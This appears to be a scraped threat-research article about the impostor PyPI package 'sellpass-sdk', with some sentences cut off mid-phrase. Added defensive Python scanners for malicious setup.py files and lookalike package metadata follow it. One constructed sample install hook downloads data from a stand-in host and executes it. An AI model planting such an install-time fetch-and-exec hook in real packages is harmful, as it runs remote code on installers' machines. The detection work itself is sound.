Python's Poisoned Package: Another 'Blank Grabber' Malware in PyPI

The Python Package Index (PyPI) is a repository that offers an extensive range of packages to simplify and speed up development.
Malicious actors regularly upload malicious packages to the repository, aimed at delivering malware that steals the victim's information or, more often, compromises their environment.
Recently, several PyPI packages were reported as part of supply chain attacks.
As part of our continuous research to improve the security of the Internet, Imperva Threat Research discovered and reported a package called 'sellpass-sdk' that followed a burst of other dummy malicious packages, most likely posted as tests by the same author.
After we reported this discovery, the PyPI team quickly removed the package.
The malicious package was added to the PyPI repository on December 27, 2023 and remained there until January 8, 2024, when it was taken down following our report to the PyPI security team.
This package masqueraded as the legitimate package named 'sellpass'.
The authentic 'sellpass' package serves as a Python wrapper for the API of Sellpass.io.
The tactics used by the author of this malicious package were interesting and designed to exploit the trust of potential users.
Figure 2: Original package's author vs. the malicious package's author.
Uploading Several Versions to Increase Perceived Legitimacy: The author uploaded two versions of the package, 'sellpass-sdk-1.0.tar.
Users often perceive packages with multiple versions as more credible and actively maintained, which increases the likelihood of download and use.
Libraries.io provides a scoring system for all PyPI packages in order to evaluate their quality.
Replicate Information from the Original Package: Adding basic information that is directly copied from the original package is another deceptive tactic.
This not only adds a layer of authenticity, but it also misleads users into thinking that the package is genuine and safe.
By using these techniques, the package was available on PyPI for 13 days, and had almost 500 downloads, before we reported it.
The other dummy packages posted by the same author included ones similar to the 'ef323refefeffe' package detailed in Socket's recent blog post, and others that used a binary file to carry out the infection.
Our detection system spotted this package due to several indicators.
When a user downloads and installs the package as a component of their project, the setup.
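A setup.py shipped in a source distribution runs with the installing user's privileges during `pip install`, which is why install-time hooks are a classic place to hide a payload. The scanner below is an added example, not Imperva's detection system and not code from the package discussed; it parses a setup.py with Python's `ast` module and reports generic indicators (risky imports, `exec`/`eval`, a `cmdclass` override that replaces the install command). Both setup.py sources are constructed samples, not the real 'sellpass' or 'sellpass-sdk' files, and the package names inside them are used only as labels.

```python
import ast

# Constructed sample setup.py sources (not taken from the page or from any real package).
BENIGN_SETUP = '''
from setuptools import setup, find_packages

setup(
    name="sellpass",
    version="1.0.0",
    description="Python wrapper for the Sellpass.io API",
    packages=find_packages(),
    install_requires=["requests"],
)
'''

SUSPICIOUS_SETUP = '''
import base64, subprocess, urllib.request
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        data = urllib.request.urlopen("http://example.invalid/payload").read()
        exec(base64.b64decode(data))
        subprocess.Popen(["python", "-c", "print('hi')"])

setup(
    name="sellpass-sdk",
    version="1.0",
    description="Python wrapper for the Sellpass.io API",
    cmdclass={"install": PostInstall},
)
'''

# Modules that a packaging script rarely needs but install-time droppers often do.
RISKY_MODULES = {"subprocess", "base64", "urllib", "socket", "ctypes", "marshal", "zlib"}
# Builtins that turn data into code.
RISKY_CALLS = {"exec", "eval", "compile", "__import__"}


def _module_is_risky(mod: str) -> bool:
    return mod in RISKY_MODULES or mod.split(".")[0] in RISKY_MODULES


def scan_setup_py(source: str) -> list:
    """Return the sorted list of indicators found in a setup.py source string."""
    tree = ast.parse(source)
    findings = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if _module_is_risky(alias.name):
                    findings.add(f"import:{alias.name}")
        elif isinstance(node, ast.ImportFrom):
            mod = node.module or ""
            if _module_is_risky(mod):
                findings.add(f"import:{mod}")
            # Subclassing a setuptools command is how install-time code is attached.
            if mod.startswith("setuptools.command"):
                findings.add("install-hook:subclasses setuptools command")
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in RISKY_CALLS:
                findings.add(f"call:{node.func.id}")
            if node.func.id == "setup":
                for kw in node.keywords:
                    if kw.arg == "cmdclass":
                        findings.add("install-hook:cmdclass override")
    return sorted(findings)


def is_suspicious(source: str) -> bool:
    """Flag when an install hook is combined with a risky import or a code-executing call."""
    findings = scan_setup_py(source)
    has_hook = any(f.startswith("install-hook:") for f in findings)
    has_payload_behaviour = any(f.startswith(("import:", "call:")) for f in findings)
    return has_hook and has_payload_behaviour


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(label, is_suspicious(src), scan_setup_py(src))
```

An indicator is a prompt for manual review rather than proof of malice: legitimate packages do override `cmdclass` for build steps, and attackers can obfuscate past a static rule, so the same checks should also be run against the wheel's contents and the package's metadata.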
Users should double-check package names, authors, and other metadata before installing, especially for critical or sensitive projects.
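One way to put that advice into practice is to compare a candidate package's metadata with the package it resembles. The example below is added here and is not from the page or from Imperva; it works on dictionaries shaped like the `info` and `releases` sections of PyPI's JSON API (https://pypi.org/pypi/<name>/json) but uses constructed records so it runs offline. The author names, release versions and dates, and the unrelated package 'otherlib' are invented, and the similarity thresholds and the seven-day upload window are assumptions to tune for your own use.

```python
import difflib
from datetime import datetime, timedelta

# Constructed records in the shape of PyPI's JSON API, trimmed to the fields used here.
# Authors, versions and dates are invented; they are not the real packages' metadata.
REFERENCE = {
    "info": {
        "name": "sellpass",
        "author": "legit-maintainer",
        "summary": "Python wrapper for the Sellpass.io API",
        "description": "A thin client for the Sellpass.io REST API with typed responses.",
    },
    "releases": {
        "0.1.0": [{"upload_time_iso_8601": "2022-03-01T10:00:00.000000Z"}],
        "0.2.0": [{"upload_time_iso_8601": "2022-09-15T10:00:00.000000Z"}],
        "1.0.0": [{"upload_time_iso_8601": "2023-05-20T10:00:00.000000Z"}],
    },
}

CANDIDATE = {
    "info": {
        "name": "sellpass-sdk",
        "author": "another-uploader",
        "summary": "Python wrapper for the Sellpass.io API",
        "description": "A thin client for the Sellpass.io REST API with typed responses.",
    },
    "releases": {
        "1.0": [{"upload_time_iso_8601": "2023-12-27T12:00:00.000000Z"}],
        "1.1": [{"upload_time_iso_8601": "2023-12-27T15:00:00.000000Z"}],
    },
}

UNRELATED = {
    "info": {
        "name": "otherlib",
        "author": "someone-else",
        "summary": "Utilities for parsing CSV files",
        "description": "Streaming CSV reader and writer helpers with schema validation.",
    },
    "releases": {
        "0.1.0": [{"upload_time_iso_8601": "2021-01-05T10:00:00.000000Z"}],
        "0.2.0": [{"upload_time_iso_8601": "2021-08-11T10:00:00.000000Z"}],
        "0.3.0": [{"upload_time_iso_8601": "2022-11-30T10:00:00.000000Z"}],
    },
}


def normalize_name(name: str) -> str:
    """PEP 503 normalisation: case-insensitive; runs of '-', '_' and '.' collapse to one '-'."""
    out, prev_sep = [], False
    for ch in name.lower():
        if ch in "-_.":
            if not prev_sep:
                out.append("-")
            prev_sep = True
        else:
            out.append(ch)
            prev_sep = False
    return "".join(out)


def _similar(a, b) -> float:
    return difflib.SequenceMatcher(None, a or "", b or "").ratio()


def _upload_times(meta) -> list:
    times = []
    for files in meta.get("releases", {}).values():
        for f in files:
            # fromisoformat() needs '+00:00' rather than 'Z' on older interpreters.
            times.append(datetime.fromisoformat(f["upload_time_iso_8601"].replace("Z", "+00:00")))
    return times


def assess(candidate, reference, burst_window=timedelta(days=7)) -> list:
    """Return the ordered list of red flags for `candidate` measured against `reference`."""
    c, r = candidate["info"], reference["info"]
    cn, rn = normalize_name(c["name"]), normalize_name(r["name"])
    lookalike = cn != rn and (rn in cn or _similar(cn, rn) >= 0.8)
    copied = (_similar(c.get("summary"), r.get("summary")) >= 0.9
              or _similar(c.get("description"), r.get("description")) >= 0.9)
    author_differs = (c.get("author") or "").strip().lower() != (r.get("author") or "").strip().lower()
    times = _upload_times(candidate)

    flags = []
    if lookalike:
        flags.append("name-lookalike")
    if copied:
        flags.append("copied-metadata")
    # A different author only matters once the package already resembles the reference.
    if (lookalike or copied) and author_differs:
        flags.append("author-mismatch")
    if len(candidate.get("releases", {})) <= 2:
        flags.append("few-releases")
    if times and max(times) - min(times) <= burst_window:
        flags.append("burst-uploads")
    return flags


def looks_like_impostor(candidate, reference) -> bool:
    """Lookalike name plus copied text plus a different author is the impostor pattern."""
    flags = assess(candidate, reference)
    return {"name-lookalike", "copied-metadata", "author-mismatch"} <= set(flags)


if __name__ == "__main__":
    print(assess(CANDIDATE, REFERENCE), looks_like_impostor(CANDIDATE, REFERENCE))
    print(assess(UNRELATED, REFERENCE), looks_like_impostor(UNRELATED, REFERENCE))
```

In practice the reference record is the package you meant to install and the candidate is whatever the resolver actually picked; a forked or renamed project will legitimately share text with its origin, so treat the impostor verdict as a reason to inspect the release contents and the maintainer history rather than as a final answer.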


This Cyber News was published on www.imperva.com. Publication date: Thu, 11 Jan 2024 18:13:03 +0000
